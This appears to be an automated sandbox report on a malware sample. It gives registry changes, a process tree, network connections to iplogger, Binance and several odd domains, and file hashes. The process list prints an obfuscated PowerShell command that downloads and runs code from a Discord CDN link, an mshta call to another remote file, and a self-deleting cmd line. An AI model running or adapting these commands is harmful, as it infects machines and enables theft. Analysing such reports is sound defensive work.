| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "335085935" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{A57F05BD-B1F6-4191-9594-BECBEFA5900F}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe
"C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe"
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\1137791014.exe
C:\Users\Admin\AppData\Local\Temp\1137791014.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875766613159333928/875767110058532884/geometre.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe & exit
C:\Windows\SysWOW64\PING.EXE
ping 0
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | iplogger.com | udp |
| N/A | 88.99.66.31:443 | iplogger.com | tcp |
| N/A | 8.8.8.8:53 | x1.c.lencr.org | udp |
| N/A | 104.73.131.204:80 | x1.c.lencr.org | tcp |
| N/A | 8.8.8.8:53 | loadexpert.info | udp |
| N/A | 45.139.184.124:80 | loadexpert.info | tcp |
| N/A | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | cookiebrokrash.info | udp |
| N/A | 45.139.184.124:80 | cookiebrokrash.info | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | www.binance.com | udp |
| N/A | 13.227.222.68:443 | www.binance.com | tcp |
| N/A | 13.227.222.68:443 | www.binance.com | tcp |
| N/A | 8.8.8.8:53 | accounts.binance.com | udp |
| N/A | 52.222.139.46:443 | accounts.binance.com | tcp |
| N/A | 52.222.139.46:443 | accounts.binance.com | tcp |
| N/A | 8.8.8.8:53 | bin.bnbstatic.com | udp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| N/A | 142.250.102.154:443 | stats.g.doubleclick.net | tcp |
| N/A | 142.250.102.154:443 | stats.g.doubleclick.net | tcp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 8.8.8.8:53 | lllwyerxedo.xyz | udp |
| N/A | 93.189.40.76:80 | lllwyerxedo.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | www.microsoft.com | udp |
| N/A | 8.8.8.8:53 | www.bing.com | udp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
Files
memory/2988-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\936213988.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
C:\Users\Admin\AppData\Local\Temp\936213988.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/2988-117-0x0000000000810000-0x0000000000811000-memory.dmp
memory/2988-119-0x0000000005970000-0x0000000005971000-memory.dmp
memory/2988-120-0x0000000005320000-0x0000000005321000-memory.dmp
memory/2988-121-0x00000000052D0000-0x00000000052D1000-memory.dmp
memory/2988-122-0x0000000005460000-0x0000000005461000-memory.dmp
memory/2988-123-0x0000000005400000-0x0000000005421000-memory.dmp
memory/3544-124-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3544-125-0x0000000000418E56-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\936213988.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
| SHA512 | 017c462fe75266f59ef4f02bd7662455e9c2fb8f2275112b0ca8a77f5871ae217e880b3da29cc712c7eeed82846c7f7f5b8356b8bb1d3f56336a710218fe262b |
memory/3544-129-0x0000000005920000-0x0000000005921000-memory.dmp
memory/3544-130-0x0000000005370000-0x0000000005371000-memory.dmp
memory/3544-131-0x00000000053D0000-0x00000000053D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1137791014.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
C:\Users\Admin\AppData\Local\Temp\1137791014.exe
| MD5 | e00d6b79ce6cf02372bb5ebad9fc0f28 |
| SHA1 | b95cfc181260cacdde0a90c404df04eee0e3e2f0 |
| SHA256 | e9292c0f88c16dbb6496656b89251124dabfe3b062d136817efb76d9d73ecd82 |
| SHA512 | e8d3677a399ef1784338099277f2ac77852f9fb46fc8a007910d096b4da22375046201fa66e6b3419d73f968c36110c6fb2bf6b7e0f113f79e4f37eb4ece9c7b |
memory/1052-132-0x0000000000000000-mapping.dmp
memory/1052-135-0x0000000000B90000-0x0000000000B91000-memory.dmp
memory/3544-137-0x0000000005410000-0x0000000005411000-memory.dmp
memory/200-138-0x0000000000000000-mapping.dmp
memory/3544-140-0x0000000005680000-0x0000000005681000-memory.dmp
memory/3544-141-0x0000000005310000-0x0000000005916000-memory.dmp
memory/1052-142-0x000000001B790000-0x000000001B792000-memory.dmp
memory/1052-143-0x00000000010D0000-0x00000000010D1000-memory.dmp
memory/3872-144-0x0000000000000000-mapping.dmp
memory/3872-149-0x0000029DF56B0000-0x0000029DF56B1000-memory.dmp
memory/3516-150-0x0000028153B20000-0x0000028153B30000-memory.dmp
memory/3872-153-0x0000029DF5880000-0x0000029DF5881000-memory.dmp
memory/3872-155-0x0000029DF56F0000-0x0000029DF56F2000-memory.dmp
memory/3872-157-0x0000029DF56F3000-0x0000029DF56F5000-memory.dmp
memory/4256-160-0x0000000000000000-mapping.dmp
memory/4324-161-0x0000000000000000-mapping.dmp
memory/3872-162-0x0000029DF56F6000-0x0000029DF56F8000-memory.dmp
memory/3544-164-0x00000000066B0000-0x00000000066B1000-memory.dmp
memory/3544-165-0x0000000006DB0000-0x0000000006DB1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\936213988.exe.log
| MD5 | b970ec393655fdd639374c1d7ee9f1cf |
| SHA1 | 2390dcc3478e41e7819e849e0007b2836e9cf2b2 |
| SHA256 | b3efeac7ea2a5be59155d49bd10100ce531e3a5f9acf9336d4242c162b7f06b8 |
| SHA512 | f4600e8c63a39ee7b244231e30aabf6621c87775884063aeba27b9d60fbe2068c40358ac905f1fd05758dbfb611a74229c99dd089e8dfda48c4e950cc7d6190f |
memory/3872-177-0x0000029DF5830000-0x0000029DF583E000-memory.dmp
memory/4936-178-0x0000000000400000-0x000000000041E000-memory.dmp
memory/4936-179-0x0000000000418F66-mapping.dmp
memory/4936-188-0x00000000053B0000-0x00000000053B1000-memory.dmp
memory/4936-190-0x00000000052A0000-0x00000000058A6000-memory.dmp
memory/4936-193-0x00000000065B0000-0x00000000065B1000-memory.dmp
memory/4936-195-0x0000000007280000-0x0000000007281000-memory.dmp
memory/4936-197-0x0000000007380000-0x0000000007381000-memory.dmp